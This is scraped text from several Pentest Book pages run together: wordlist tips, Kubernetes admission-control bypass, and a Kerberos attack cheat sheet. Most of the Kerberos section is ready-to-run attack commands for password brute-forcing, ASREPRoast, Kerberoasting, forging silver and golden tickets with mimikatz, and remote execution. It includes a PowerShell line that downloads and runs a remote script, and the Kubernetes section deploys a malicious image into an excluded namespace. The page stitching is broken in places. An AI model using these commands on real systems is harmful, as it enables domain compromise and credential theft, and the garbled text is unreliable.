first,flast,firstl # Common patterns: # john.smith # jsmith # smithj # john_smith # john.s Copy # Hashcat rules hashcat -r /usr/share/hashcat/rules/best64.rule wordlist.txt --stdout > mutated.txt # John rules john --wordlist=wordlist.txt --rules --stdout > mutated.txt # Common mutations: # - Add years (2023, 2024, 2025) # - Add special chars (!@#$) # - Leetspeak (a→@, e→3, o→0) # - Capitalize first letter # - Add company name Copy # Remove duplicates sort wordlist.txt | uniq > sorted.txt # Remove entries shorter than 6 chars awk 'length >= 6' wordlist.txt > filtered.txt # Combine wordlists cat list1.txt list2.txt | sort -u > combined.txt # Remove blank lines sed '/^$/d' wordlist.txt > clean.txt # Lowercase everything tr '[:upper:]' '[:lower:]' < wordlist.txt > lowercase.txt Copy # Trusted resolvers for subdomain enumeration # https://github.com/trickest/resolvers # Quick download wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt # Validate resolvers (remove dead ones) dnsvalidator -tL resolvers.txt -threads 100 -o valid_resolvers.txt --- # K8s Admission Bypass | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass.md) . > **Skill Level**: Advanced **Prerequisites**: Kubernetes architecture, RBAC, OPA/Gatekeeper [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#understanding-admission-controllers) Understanding Admission Controllers ---------------------------------------------------------------------------------------------------------------------------------------------------- Copy # Admission flow: # 1. API Request → Authentication → Authorization → Admission Controllers → etcd # Types: # - Validating: Accept/reject requests # - Mutating: Modify requests before persistence # Common admission controllers: # - PodSecurityPolicy (deprecated) / PodSecurity # - OPA Gatekeeper # - Kyverno # - Admission webhooks (custom) [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#enumeration) Enumeration ---------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#discover-admission-controllers) Discover Admission Controllers Copy # Check enabled admission controllers kubectl get --raw /apis/admissionregistration.k8s.io/v1/validatingwebhookconfigurations | jq kubectl get --raw /apis/admissionregistration.k8s.io/v1/mutatingwebhookconfigurations | jq # List all webhook configurations kubectl get validatingwebhookconfigurations kubectl get mutatingwebhookconfigurations # Check specific webhook details kubectl describe validatingwebhookconfiguration gatekeeper-validating-webhook-configuration # OPA Gatekeeper constraints kubectl get constraints kubectl get constrainttemplates # Kyverno policies kubectl get clusterpolicies kubectl get policies -A ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#identify-policy-gaps) Identify Policy Gaps [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#policy-bypass-techniques) Policy Bypass Techniques ------------------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#excluded-namespace-abuse) Excluded Namespace Abuse ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#label-based-bypass) Label-Based Bypass ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#time-of-check-vs-time-of-use-toctou) Time-of-Check vs Time-of-Use (TOCTOU) ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#ephemeral-container-bypass) Ephemeral Container Bypass ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#webhook-timeout-bypass) Webhook Timeout Bypass ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#webhook-availability-attack) Webhook Availability Attack ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#static-pod-bypass) Static Pod Bypass [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#opa-gatekeeper-specific-bypasses) OPA Gatekeeper Specific Bypasses ---------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#constraint-template-gaps) Constraint Template Gaps ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#rego-logic-exploitation) Rego Logic Exploitation ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#sync-resource-manipulation) Sync Resource Manipulation [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#kyverno-specific-bypasses) Kyverno Specific Bypasses -------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#generate-rule-bypass) Generate Rule Bypass ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#background-scan-limitations) Background Scan Limitations [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#pod-security-standards-pss-bypass) Pod Security Standards (PSS) Bypass -------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#namespace-label-manipulation) Namespace Label Manipulation ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#runtimedefault-bypass) RuntimeDefault Bypass ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#user-namespace-bypass-kubernetes-1.25) User Namespace Bypass (Kubernetes 1.25+) [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#admission-webhook-exploitation) Admission Webhook Exploitation ------------------------------------------------------------------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#webhook-configuration-tampering) Webhook Configuration Tampering ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#certificate-issues) Certificate Issues [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#detection-and-prevention) Detection & Prevention ---------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#monitoring-commands) Monitoring Commands ### [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#hardening-recommendations) Hardening Recommendations [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#checklist) Checklist ------------------------------------------------------------------------------------------------ [](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#related-topics) Related Topics ---------------------------------------------------------------------------------------------------------- * [Docker/Kubernetes](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes) - Container security * [RBAC](https://github.com/six2dez/pentest-book/blob/master/enumeration/webservices/kubernetes-rbac.md) - Kubernetes authorization * [Container Escapes](https://www.pentest-book.com/enumeration/cloud/docker-and-and-kubernetes#container-escapes) - Breakout techniques [PreviousCloud AI Security](https://www.pentest-book.com/enumeration/cloud/cloud-ai-security) [NextPayloads](https://www.pentest-book.com/exploitation/payloads) Last updated 5 months ago Was this helpful? * [Understanding Admission Controllers](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#understanding-admission-controllers) * [Enumeration](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#enumeration) * [Discover Admission Controllers](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#discover-admission-controllers) * [Identify Policy Gaps](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#identify-policy-gaps) * [Policy Bypass Techniques](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#policy-bypass-techniques) * [Excluded Namespace Abuse](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#excluded-namespace-abuse) * [Label-Based Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#label-based-bypass) * [Time-of-Check vs Time-of-Use (TOCTOU)](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#time-of-check-vs-time-of-use-toctou) * [Ephemeral Container Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#ephemeral-container-bypass) * [Webhook Timeout Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#webhook-timeout-bypass) * [Webhook Availability Attack](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#webhook-availability-attack) * [Static Pod Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#static-pod-bypass) * [OPA Gatekeeper Specific Bypasses](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#opa-gatekeeper-specific-bypasses) * [Constraint Template Gaps](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#constraint-template-gaps) * [Rego Logic Exploitation](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#rego-logic-exploitation) * [Sync Resource Manipulation](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#sync-resource-manipulation) * [Kyverno Specific Bypasses](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#kyverno-specific-bypasses) * [Generate Rule Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#generate-rule-bypass) * [Background Scan Limitations](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#background-scan-limitations) * [Pod Security Standards (PSS) Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#pod-security-standards-pss-bypass) * [Namespace Label Manipulation](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#namespace-label-manipulation) * [RuntimeDefault Bypass](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#runtimedefault-bypass) * [User Namespace Bypass (Kubernetes 1.25+)](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#user-namespace-bypass-kubernetes-1.25) * [Admission Webhook Exploitation](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#admission-webhook-exploitation) * [Webhook Configuration Tampering](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#webhook-configuration-tampering) * [Certificate Issues](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#certificate-issues) * [Detection & Prevention](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#detection-and-prevention) * [Monitoring Commands](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#monitoring-commands) * [Hardening Recommendations](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#hardening-recommendations) * [Checklist](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#checklist) * [Related Topics](https://www.pentest-book.com/enumeration/cloud/k8s-admission-bypass#related-topics) Was this helpful? Copy # Check what namespaces are excluded kubectl get validatingwebhookconfiguration gatekeeper-validating-webhook-configuration -o json | \ jq '.webhooks[].namespaceSelector' # Common excluded namespaces: # - kube-system # - gatekeeper-system # - kyverno # - cert-manager # Check failurePolicy kubectl get validatingwebhookconfiguration -o json | \ jq '.items[].webhooks[].failurePolicy' # Ignore = bypass when webhook fails # Fail = deny when webhook fails Copy # If kube-system is excluded from admission kubectl create deployment pwned --image=malicious:latest -n kube-system # Create pod in excluded namespace cat < /etc/kubernetes/manifests/pwned.yaml < Requirements: connection with DC/KDC. ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external) Linux (external) With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute) : ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal) Windows (internal) With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#asreproast) ASREPRoast --------------------------------------------------------------------------------------------------------- > Cracking users password, with KRB\_AS\_REQ when user has DONT\_REQ\_PREAUTH attribute, KDC respond with KRB\_AS\_REP user hash and then go for cracking. ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-1) Linux (external) With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py: ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-1) Windows (internal) With [Rubeus](https://github.com/GhostPack/Rubeus) : Cracking with dictionary of passwords: [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#kerberoasting) Kerberoasting --------------------------------------------------------------------------------------------------------------- > Cracking users password from TGS, because TGS requires Service key which is derived from NTLM hash ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-2) Linux (external) With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py: ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-2) Windows (internal) With [Rubeus](https://github.com/GhostPack/Rubeus) : With **Powershell**: Cracking with dictionary of passwords: [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#overpass-the-hash-pass-the-key-ptk) Overpass The Hash/Pass The Key (PTK) ----------------------------------------------------------------------------------------------------------------------------------------------------------- > NTDS.DIT, SAM files or lsass with mimi ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-3) Linux (external) By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-3) Windows (internal) With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) : [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#pass-the-ticket-ptt) Pass The Ticket (PTT) ----------------------------------------------------------------------------------------------------------------------------- > MiTM, lsass with mimi ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-4) Linux (external) Check type and location of tickets: If none return, default is FILE:/tmp/krb5cc\_%{uid}. In case of file tickets, you can copy-paste (if you have permissions) for use them. In case of being _KEYRING_ tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them: ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-4) Windows (internal) With [Mimikatz](https://github.com/gentilkiwi/mimikatz) : With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell: To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter) : ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#using-ticket-in-linux) Using ticket in Linux With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#using-ticket-in-windows) Using ticket in Windows Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz) : Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus) : Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) : [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#silver-ticket) Silver ticket --------------------------------------------------------------------------------------------------------------- > Build a TGS with Service key ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-5) Linux (external) With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-5) Windows (internal) With [Mimikatz](https://github.com/gentilkiwi/mimikatz) : Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus) : Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) : [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#golden-ticket) Golden ticket --------------------------------------------------------------------------------------------------------------- > Build a TGT with NTLM hash and krbtgt key, valid until krbtgt password is changed or TGT expires Tickets must be used right after created ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-6) Linux (external) With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-6) Windows (internal) With [Mimikatz](https://github.com/gentilkiwi/mimikatz) : Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus) : Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) : [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#misc) Misc --------------------------------------------------------------------------------------------- To get NTLM from password: [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#delegation) Delegation --------------------------------------------------------------------------------------------------------- > Allows a service impersonate the user to interact with a second service, with the privileges and permissions of the user > > * If a user has delegation capabilities, all its services (and processes) have delegation capabilities. > > * KDC only worries about the user who is talking to, not the process. > > * Any process belonging to the same user can perform the same actions in Kerberos, regardless of whether it is a service or not. > > * Unable to delegate if NotDelegated (or ADS\_UF\_NOT\_DELEGATED) flag is set in the User-Account-Control attribute of the user account or user in Protected Users group. > ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#unconstrained-delegation) Unconstrained delegation 1. _User1_ requests a TGS for _ServiceZ_, of _UserZ_. 2. The KDC checks if _UserZ_ has the _TrustedForDelegation_ flag set (Yes). 3. The KDC includes a TGT of _User1_ inside the TGS for _ServiceZ_. 4. _ServiceZ_ receives the TGS with the TGT of _User1_ included and stores it for later use. ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk-8__qI4BpTE5vYQe%252Fimagen.png%3Falt%3Dmedia%26token%3Dce11cdac-68c4-4fd3-8315-72e15b49ccc8&width=768&dpr=3&quality=100&sign=6154922d&sv=2) ### [](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#contrained-delegation-and-rbcd-resource-based-constrained-delegation) Contrained delegation and RBCD (Resource Based Constrained Delegation) Delegation is constrained to only some whitelisted third-party services. * S4U2Proxy Contrained ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk5NRh-1DRi2PSlOg9%252Fimagen.png%3Falt%3Dmedia%26token%3D2c85809e-90f7-4e32-be25-68acca688de6&width=768&dpr=3&quality=100&sign=29338ace&sv=2) * S4U2Proxy RBCD ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk5oJIAk68yBYKG-ZU%252Fimagen.png%3Falt%3Dmedia%26token%3D6518a297-5d4d-4e29-906a-f37499859f5d&width=768&dpr=3&quality=100&sign=a78bc0f5&sv=2) * S4U2Proxy Service Name Change ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk6HBbfqktEqOW16V-%252Fimagen.png%3Falt%3Dmedia%26token%3D27ea4e62-c7e4-429a-802a-85d200fc7945&width=768&dpr=3&quality=100&sign=f823e2c6&sv=2) * S4U2Self ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk6Pyr1-q-LcNlMiO4%252Fimagen.png%3Falt%3Dmedia%26token%3Dd59a848e-0a38-4150-a898-af85aa3282f5&width=768&dpr=3&quality=100&sign=e5071d32&sv=2) * S4U2Self & S4U2Proxy combined Contrained ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk6fK3Q_qZC3MccOrs%252Fimagen.png%3Falt%3Dmedia%26token%3Dcc53da4c-7853-4969-bacb-c7681aeef3d8&width=768&dpr=3&quality=100&sign=529ae063&sv=2) * S4U2Self & S4U2Proxy combined RBCD ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk6qTPb1oT1Dk3szZ6%252Fimagen.png%3Falt%3Dmedia%26token%3D5917d3a6-bc9e-47da-8f61-c10275850f83&width=768&dpr=3&quality=100&sign=11be59fa&sv=2) * RBCD attack [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=21fe07f0&sv=2)GitHub - tothi/rbcd-attack: Kerberos Resource-Based Constrained Delegation Attack from Outside using ImpacketGitHub](https://github.com/tothi/rbcd-attack) ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MHjzqJMdtof3HGCZXsn%252F-MHk7uW8OVdAvUHANaNU%252Fimagen.png%3Falt%3Dmedia%26token%3D5d1adf66-68de-43d6-96a6-dd3269e14f21&width=768&dpr=3&quality=100&sign=a238b712&sv=2) [PreviousAD](https://www.pentest-book.com/post-exploitation/windows/ad) [NextPS tips & tricks](https://www.pentest-book.com/post-exploitation/windows/ps-tips-and-tricks) Last updated 5 years ago Was this helpful? * [Info](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#info) * [How it works](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#how-it-works) * [Step 1](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#step-1) * [Step 2](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#step-2) * [Step 3](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#step-3) * [Step 4](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#step-4) * [Step 5](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#step-5) * [Bruteforcing](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#bruteforcing) * [Linux (external)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external) * [Windows (internal)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal) * [ASREPRoast](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#asreproast) * [Linux (external)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-1) * [Windows (internal)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-1) * [Kerberoasting](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#kerberoasting) * [Linux (external)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-2) * [Windows (internal)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-2) * [Overpass The Hash/Pass The Key (PTK)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#overpass-the-hash-pass-the-key-ptk) * [Linux (external)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-3) * [Windows (internal)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-3) * [Pass The Ticket (PTT)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#pass-the-ticket-ptt) * [Linux (external)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-4) * [Windows (internal)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-4) * [Using ticket in Linux](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#using-ticket-in-linux) * [Using ticket in Windows](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#using-ticket-in-windows) * [Silver ticket](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#silver-ticket) * [Linux (external)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-5) * [Windows (internal)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-5) * [Golden ticket](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#golden-ticket) * [Linux (external)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#linux-external-6) * [Windows (internal)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#windows-internal-6) * [Misc](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#misc) * [Delegation](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#delegation) * [Unconstrained delegation](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#unconstrained-delegation) * [Contrained delegation and RBCD (Resource Based Constrained Delegation)](https://www.pentest-book.com/post-exploitation/windows/ad/kerberos-attacks#contrained-delegation-and-rbcd-resource-based-constrained-delegation) Was this helpful? Copy python kerbrute.py -domain -users -passwords -outputfile Copy # with a list of users .\Rubeus.exe brute /users: /passwords: /domain: /outfile: # check passwords for all users in current domain .\Rubeus.exe brute /passwords: /outfile: Copy # LDAP filter for non preauth krb users LDAP: (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) Copy # check ASREPRoast for all domain users (credentials required) python GetNPUsers.py /: -request -format -outputfile # check ASREPRoast for a list of users (no credentials required) python GetNPUsers.py / -usersfile -format -outputfile Copy # check ASREPRoast for all users in current domain .\Rubeus.exe asreproast /format: /outfile: # Powerview Get-DomainUser -PreauthNotRequired # https://github.com/HarmJ0y/ASREPRoast Copy hashcat -m 18200 -a 0 john --wordlist= Copy # LDAP filter for users with linked services LDAP: (&(samAccountType=805306368)(servicePrincipalName=*)) Copy python GetUserSPNs.py /: -outputfile Copy .\Rubeus.exe kerberoast /outfile: Copy iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat | % { $_.Hash } | Out-File -Encoding ASCII Copy hashcat -m 13100 --force john --format=krb5tgs --wordlist= Copy # Request the TGT with hash python getTGT.py / -hashes [lm_hash]: # Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft) python getTGT.py / -aesKey # Request the TGT with password python getTGT.py /:[password] # If not provided, password is asked # Set the TGT for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass Copy # Ask and inject the ticket .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt # Execute a cmd in the remote machine .\PsExec.exe -accepteula \\ cmd Copy grep default_ccache_name /etc/krb5.conf Copy # To dump current user tickets, if root, try to dump them all by injecting in other user processes # to inject, copy tickey in a reachable folder by all users cp tickey /tmp/tickey /tmp/tickey -i Copy mimikatz # sekurlsa::tickets /export Copy .\Rubeus dump # After dump with Rubeus tickets in base64, to write the in a file [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("")) Copy # ccache (Linux), kirbi (Windows from mimi/Rubeus) python ticket_converter.py ticket.kirbi ticket.ccache python ticket_converter.py ticket.ccache ticket.kirbi Copy # Set the ticket for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass Copy mimikatz # kerberos::ptt Copy .\Rubeus.exe ptt /ticket: Copy .\PsExec.exe -accepteula \\ cmd Copy # To generate the TGS with NTLM python ticketer.py -nthash -domain-sid -domain -spn # To generate the TGS with AES key python ticketer.py -aesKey -domain-sid -domain -spn # Set the ticket for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass Copy # To generate the TGS with NTLM mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target: # To generate the TGS with AES 128 key mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target: # To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target: # Inject TGS with Mimikatz mimikatz # kerberos::ptt Copy .\Rubeus.exe ptt /ticket: Copy .\PsExec.exe -accepteula \\ cmd Copy # To generate the TGT with NTLM python ticketer.py -nthash -domain-sid -domain # To generate the TGT with AES key python ticketer.py -aesKey -domain-sid -domain # Set the ticket for impacket use export KRB5CCNAME= # Execute remote commands with any of the following by using the TGT python psexec.py /@ -k -no-pass python smbexec.py /@ -k -no-pass python wmiexec.py /@ -k -no-pass Copy # To generate the TGT with NTLM mimikatz # kerberos::golden /domain:/sid: /rc4: /user: # To generate the TGT with AES 128 key mimikatz # kerberos::golden /domain:/sid: /aes128: /user: # To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) mimikatz # kerberos::golden /domain:/sid: /aes256: /user: # Inject TGT with Mimikatz mimikatz # kerberos::ptt Copy .\Rubeus.exe ptt /ticket: Copy .\PsExec.exe -accepteula \\ cmd Copy python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "".encode("utf-16le")).digest())' ---